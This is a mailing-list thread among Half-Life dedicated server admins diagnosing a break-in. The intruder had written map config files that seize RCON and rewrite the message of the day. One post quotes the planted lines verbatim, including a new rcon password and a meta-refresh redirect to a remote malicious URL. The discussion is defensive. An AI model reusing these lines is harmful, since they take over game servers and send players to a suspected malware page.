You can still upload arbitrary files to anywhere on any system running SRCDS. Since the exploit seems to have originated from Quake, was this ever fixed/addressed in HLDS (if it does exist)? I seem to remember seeing a plugin that helped fix this for CS1.5.
Thanks, Kyle. On Thu, Jan 3, 2013 at 1:08 PM, Eli Witt <[email protected]> wrote: > It's pretty much certain that he's got an AMX plugin with a security hole > in it. > > > > On Thu, Jan 3, 2013 at 8:10 AM, Bjorn Wielens <[email protected]> wrote: > > > Interesting. I was under the impression that RCON can't make permanent > > server config changes (i.e. write to config files) - I thought it was > only > > limited to being able to change current cvars in memory, which would be > > wiped the next time a config changes them. > > > > Have I got that wrong? > > > > If not, I'd suspect the attack vector is probably not via RCON... more > > likely an exploit via a file upload mechanism or so (sprays?) to get the > > malicious .cfg there in the first place. > > Sadly the redirected URL doesn't respond for me, so I can't take a look > > and see what they were attempting to do with it. (more than likely a > > drive-by malware install or something). > > > > > > > > > > > > > > ________________________________ > > From: Collin Howard <[email protected]> > > To: Half-Life dedicated Linux server mailing list < > > [email protected]> > > Sent: Wednesday, January 2, 2013 3:23:33 PM > > Subject: Re: [hlds_linux] Remote connection with rcon > > > > Looks like there might be a new exploit or hack. Somehow, someone was > able > > to create a maps folder in my amxmodx config folder and create map > specific > > cfg files and added the following lines to it: > > > > amxx pause rcon_defencer.amxx > > rcon_password "56425642" > > motdfile motd.txt > > motd_write <META HTTP-EQUIV=Refresh CONTENT="0 URL= > > http://78.110.63.117//abunaimo.php?jecttely=674660";> > > > > I dont use ftp on the box, only access to the box is via ssh and the ssh > > port is a completely random port and the password is 25+ character > > completely random password. So I dont think anyone could have gained > access > > to the box directly to do this. Is there a known exploit or hack that > does > > this? This was done with only one HLDS setup on the box while the other > > HLDS setups were not effected. These files are what were causing my issue > > of not being able to remotely connect with the rcon specified in > server.cfg > > > > > > > > ________________________________ > > From: Ken Bateman <[email protected]> > > To: Collin Howard <[email protected]>; Half-Life dedicated Linux > server > > mailing list <[email protected]> > > Sent: Tuesday, January 1, 2013 1:43:32 AM > > Subject: Re: [hlds_linux] Remote connection with rcon > > > > > > > > > > > > On Tue, Jan 1, 2013 at 1:15 AM, Collin Howard <[email protected]> > wrote: > > > > From the looks of it, server.cfg is not automatically executing when the > > map changes and even when I restart the hlds. Anyone have a clue on whats > > going on? Doing exec server.cfg in console executed the config file and > > rcon started working. Any ideas? > > > > > > > Is servercfgfile set to "server.cfg"? Is it being set to something > > different on the command line or in autoexec.cfg? > > > > -Ken > > _______________________________________________ > > To unsubscribe, edit your list preferences, or view the list archives, > > please visit: > > https://list.valvesoftware.com/cgi-bin/mailman/listinfo/hlds_linux > > _______________________________________________ > > To unsubscribe, edit your list preferences, or view the list archives, > > please visit: > > https://list.valvesoftware.com/cgi-bin/mailman/listinfo/hlds_linux > > > _______________________________________________ > To unsubscribe, edit your list preferences, or view the list archives, > please visit: > https://list.valvesoftware.com/cgi-bin/mailman/listinfo/hlds_linux > _______________________________________________ To unsubscribe, edit your list preferences, or view the list archives, please visit: https://list.valvesoftware.com/cgi-bin/mailman/listinfo/hlds_linux
